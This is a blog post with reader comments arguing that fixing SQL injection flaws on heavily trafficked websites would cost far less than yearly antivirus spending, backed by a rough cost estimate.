The Cost of Fixing Vulnerabilities vs. Antivirus Software

Corporations and consumers will collectively spend $8 billion this year on desktop security software, better known as antivirus software. This is a lot of money, and more is spent each and every year while the problem of computer viruses only worsens. I often wonder how this money could be more effectively spent, such as on activities that would significantly reduce the means by which viruses propagate.

Computer viruses predominantly spread in two ways, Web and Email:

  1. A Web browser visits a website that automatically serves up a software exploit, or the website asks the visitor to voluntarily download and install a virus-laced application.
  2. An email is received that automatically launches a software exploit, or the email recipient is asked to voluntarily download and install a virus-laced attachment.

It is the first instance that I’d like to focus on. The vast majority of websites that serve up viruses are ‘legitimate’ websites, they’ve just been hacked. An attacker exploits a SQL Injection vulnerability in a target website and uses it to insert a virus, or links pointing to a virus, whereby a visiting Web browser is compromised. It would stand to reason that if these SQL Injection vulnerabilities didn’t exist to begin with, viruses could not propagate this way.

Let’s say we take the top five hundred thousand of the most trafficked and “important” websites. Statistics at WhiteHat Security say that about 11% of websites, or 55,000 in our target set, have at least 1 SQL Injection vulnerability. We should also assume that if there is 1 SQL Injection in a given website, then there is really 10. This gives us a total of 550,000 SQL Injection vulnerabilities in circulation. Finally, let’s estimate that each SQL Injection vulnerability will require 40 developer hours x $100 per hour to fix, or about $4,000 total in labor costs.

When all the math is combined (550,000 x $4,000) we get a total of $2.2 billion to fix our SQL Injection issues that are responsible for a significant chunk of our computer virus woes — or about 1/4 of what is spent on antivirus software. Contrast this that the corporations spend less than $500 million each year on application security, even when you combine vulnerability scanning, Web application firewalls, source code reviews, developments training, etc.

Here’s another added benefit of fixing the vulnerability over the purchase of antivirus software. When a vulnerability like SQL Injection is fixed (properly), you don’t have to spend that money next year to fix it again. With antivirus software, you must pay the costs each and every year for the foreseeable future with little to no benefit carried forward.

I also often wonder what it will take to influence a shift information security spending habits from one of tradition to efficacy.

  • Richard

    I do agree with it’s important to fix the isse at the root soure. But in a security depth model, you need to have aan antivirus software too in the case of email when attachment or link included in HTML or other piece of malicious code.

  • Maciej Łebkowski

    Seriously? 40 man-hours to fix SQL injection?

    • Chris W

      Im actualy doing a cost benefit for my company on this. 40 hrs does seem high, any ideas on a more reasonable number?

  • kingthorin

    I’m going to go ahead and point out for any nay-sayers that even if you double it to also account for XSS or triple it to account for XSS and some other type of attack (CSRF, Click-jacking, whatever) you’re still well under the 8Billion for AV.

  • Bennet_Marky

    Hi Jeremiah,

    I truly agree with you. It is important that we fix the email and web browser problem. Unless these two are not properly corrected, there is no use in installing anti-virus software. Each year you will end up installing new software and every month a new kind of virus will crop up. So you will really have the trouble of keeping your system updated. Now that is the most common problem that every computer user suffers from.

  • Trinidad

    Excellent post. Keep writing such kind of information on your page.

    Im really impressed by your blog.

    Hi there, You have done a great job. I’ll certainly digg it and for my part suggest to my friends. I am sure they will be benefited from this site.